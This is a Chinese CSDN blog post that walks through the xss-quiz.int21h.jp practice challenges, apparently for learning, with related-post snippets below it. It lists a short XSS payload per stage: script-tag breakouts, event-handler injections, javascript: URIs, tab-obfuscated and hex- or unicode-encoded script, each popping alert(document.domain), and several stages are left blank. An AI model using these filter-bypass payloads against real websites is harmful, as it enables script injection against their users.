xss_quiz

最新推荐文章于 2021-04-17 18:14:33 发布
最新推荐文章于 2021-04-17 18:14:33 发布
阅读量829 收藏
点赞数
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x728999452/article/details/52367036
版权

练习地址:xss_quiz


Stage #1

<script>alert(document.domain)</script>


Stage #2

"><script>alert(document.domain)</script>


Stage #3


Stage #4

Stage #5

用firebug,删除 maxlength="15"

text box中:"><script>alert(document.domain)</script>


Stage #6

" οnmοuseοver="alert(document.domain);"


Stage #7

" οnmοuseοver=alert(document.domain);


Stage #8

javascript:alert(document.domain);


Stage #9

Hint: UTF-7 XSS

提示为UTF-7,未利用成功。


Stage #10

"><script>alert(document.dodomainmain)</script>


Stage #11

"><a href="javascrip&#09;t:alert(document.domain);">foo</a>


Stage #12

``οnmοuseοver=alert(document.domain);

(IE Only)


Stage #13


Stage #14


Stage #15

对'>' '<' 进行16进制编码

\\x3Cscript\\x3Ealert(document.domain)\\x3C/script\\x3E


Stage #16

对'>' '<' 进行Unicode编码

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e


Stage #17

Stage #18


回忆里的褶皱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss实验Challenges
m0_51607644的博客
03-14 236
1
XSS Challenges
Nixawk
06-02 5317
http://xss-quiz.int21h.jp/ Notes (for all stages): * NEVER DO ANY ATTACKS EXCEPT XSS. * DO NOT USE ANY AUTOMATED SCANNER (AppScan, WebInspect, WVS, ...) * Some stages may fit only IE. Stage #1:
xss-quiz challenge
0pt1mus
04-17 726
转自个人博客:0pt1mus 00 靶场地址 http://xss-quiz.int21h.jp/ 01 stage #1 题目要求执行script命令:alert(document.domain) F12查看源码 hidden部分不知道有啥用,但是表单POST提交的只有p1,随便写个内容上去,提交后如下。 提交内容被双引号包围"",在插入内容左右添加“进行闭合。 payload = '"<script>alter(document.domain);</script>"'
xss-quiz.int21h.jp——Stage #1
王嘟嘟的博客
09-17 1046
0x00 前言 xss-quiz.int21h.jp是一个在线的xss练习平台,正好用来增加自己的见识。所以就从第一章开始了。 0x01 学习 这个是题目,我们直接使用经典的进行测试。 成功弹窗。 然后使用 alert(document.domain);来进行测试。 成功过关 0x02 总结&amp;分析 第一关应该是没有进行过滤的,然后直接返回结果。 1.前...
xss-quiz.int21h.jp——Stage #15
王嘟嘟的博客
09-19 520
0x00 前言 Stage 12 是IE浏览器 Stage 13 14 是同一个类型的也要求IE浏览器 我这里的环境有问题所以不能复现以下操作过程,所以没有进行记录。 0x01 尝试 使用&lt;script&gt;alert("1")&lt;/script&gt;进行尝试 然后进行源码的查看。 发现这里是一个script代码的显示的地方。所以我们要进行Script语言的操作。 这里使用时间响...
quiz_app
03-19
Quiz_App 可能包括创建、编辑、发布测验,以及跟踪用户成绩等功能。PHP 作为服务器端脚本语言,以其灵活性、易用性和丰富的库支持,成为开发此类应用的理想选择。 【主要知识点】 1. **PHP基础**:Quiz_App 的核心...
第一节 没有过滤的XSS-01
最新发布
09-15
这里推荐的是由日本安全研究员创建的XSS练习靶场——[XSS-Quiz.int21h.jp](https://xss-quiz.int21h.jp/)。这个平台提供了各种XSS挑战,帮助初学者了解并熟悉XSS漏洞的检测和利用方法。 ### 2. HTML中文本标签b介绍...
Quiz_1_Webservice:1718019
02-18
【标题】"Quiz_1_Webservice:1718019" 是一个与Web服务相关的测验,可能是某个在线课程或教育平台上的练习题目。这个测验可能旨在检验学习者对Web服务的理解,特别是JavaScript在构建和交互Web服务中的应用。 ...
quiz
03-27
- 输入验证:防止SQL注入、XSS攻击等。 - 数据加密:保护用户隐私信息,如密码和敏感数据。 - 安全编码实践:遵循OWASP(开放网络应用安全项目)指南。 8. **部署与维护**: - 使用Docker容器化应用程序,便于...
quizmaker_cms_go:Quiz Maker CMS Go后端存储库
02-14
11. **安全性**:考虑到用户认证和授权,Quiz Maker CMS可能采用了JWT(JSON Web Tokens)或者其他身份验证机制,以及防止SQL注入和XSS攻击的安全策略。 12. **持续集成/持续部署(CI/CD)**:项目可能集成了如...
xss-quiz.int21h.jp——Stage #3
王嘟嘟的博客
09-17 953
0x00 前言 之前完成了Stage #2 是真的自己就可以完成的,但是这个#3却是baidu完成的,总结一下就是因为见识太短浅了。所以还需要努力呀。 0x01 尝试 使用通常测试 都说这里是对&lt;&gt;进行了过滤所以这里已经没有办法进行xss了。 我自己到这里就已经没有办法了。所以只好求助百度了。 0x02 大神解法 这里可以使用burpSuite来解,也可以使用fire...
XSS quiz练习题做题过程及感悟
weixin_30340353的博客
11-29 580
XSS quiz 最近刚学XSS。所以新手理解如有错误不当,欢迎批评指正。 第1题 一开始做,使用了Chrome浏览器。第一题怎么都做不出来。突然想起来使用IE,打开IE11,才成功了。 <script>alert(document.domain);</script> 第2题 第二题,直接用这个不行。 查看源代码。 构造一个,把左边的&...
XSS quiz 1~5解题方案
CClarence的专栏
12-12 2426
第1题 第一题很简单,没做过滤,直接可A过 第二题 查询框中写123查看源码, 需要先闭合左边的input,所以“>即可 第三题 本题有过滤当输入“>时发现引号、尖括号都被过滤 <>” 分别变成了转义符,尝试Unicode编码也未见效: <为\u003c,>为\u003e,”为\u0022 后来看到页面有一个复选框,想到框内元素可以进行注入,于是抓包,p2参数后加上“>可通
XSS Challenges xss-quiz.int21h.jp
weixin_30851409的博客
04-19 881
概述: https://xss-quiz.int21h.jp/ Stage #1 payload:<script>alert(document.domain);</script> Stage #2 http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf6...
XSS quiz 6~10解题方案
CClarence的专栏
12-13 2325
第六题 本题转义了尖括号。并且根据Hint:event handle attributes,意思就是像input标签里进行添加事件,于是尝试通过不用尖括号的方式写入xss语句。 先用\u003c和\u003e来代替<和>,失败。 用” onmousemove=”alert(document.domain) 成功。 第七题 Hint,Hint: nearly the same… but a
xss-quiz.int21h.jp——Stage #10
王嘟嘟的博客
09-18 441
文章目录0x00 前言0x01 尝试0x02 过滤 0x00 前言 之前的Stage#9看了提示是UTF-7编码的,这道题我可能解决不了,因为没有IE7的环境,所以没有办法进行尝试。所以只好来搞Stage#10。 0x01 尝试 看到源码是标签,首先要尝试的就是对这个标签进行闭合。 使用"&gt;&lt;script&gt;alert(1);&lt;/script&gt;进行尝试。 发现成功产生了...
xss-quiz.int21h.jp——Stage #8
王嘟嘟的博客
09-18 401
文章目录0x00 前言0x01 尝试知识点补充0x02 解题 0x00 前言 昨天学了xss-quiz.int21h.jp——Stage #7,因为CSDN的限制,所以只能留在今天来学习了。 0x01 尝试 使用&amp;lt;script&amp;gt;alert(1);&amp;lt;/script&amp;gt;来进行尝试。 这里发现是一个a标签,并且会把输入的内容进行一个过滤然后显示出来。 知识点补充 关于a标签,有一...
xss-quiz.int21h.jp——Stage #7
王嘟嘟的博客
09-18 524
0x00 前言 之前学习了Stage #6的方式,学到了如何使用onclick的方式进行绕过检测。 0x01 尝试 使用&amp;lt;script&amp;gt;alert(1);&amp;lt;/script&amp;gt;进行测试 这里发现还是被直接过滤了。 然后尝试使用&quot;&amp;gt;&amp;lt;/input&amp;gt;&amp;lt;script&amp;gt;ale
xss-quiz.int21h.jp——Stage #6
王嘟嘟的博客
09-17 363
0x00 前言 之前是Stage #5,感觉仿佛陷入了思维漏洞。也是因为之前对这些不能理解。所以没有想到。 0x01 尝试 首先使用dudu进行尝试。 发现正常,感觉自己试这一步有没有意义,暂时先不理。 使用"&gt;&lt;script&gt;alert(1);&lt;/script&gt;进行测试。 出现结果是 " &amp;gt;&amp;lt;script&amp...
idea 报错 安全过滤配置文件xss_security_config.xml加载异常
09-06
当我们遇到"idea 报错 安全过滤配置文件xss_security_config.xml加载异常"这个问题时,表示我们的IDEA开发环境无法正确加载xss_security_config.xml文件。xss_security_config.xml是一种安全过滤配置文件,用于防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值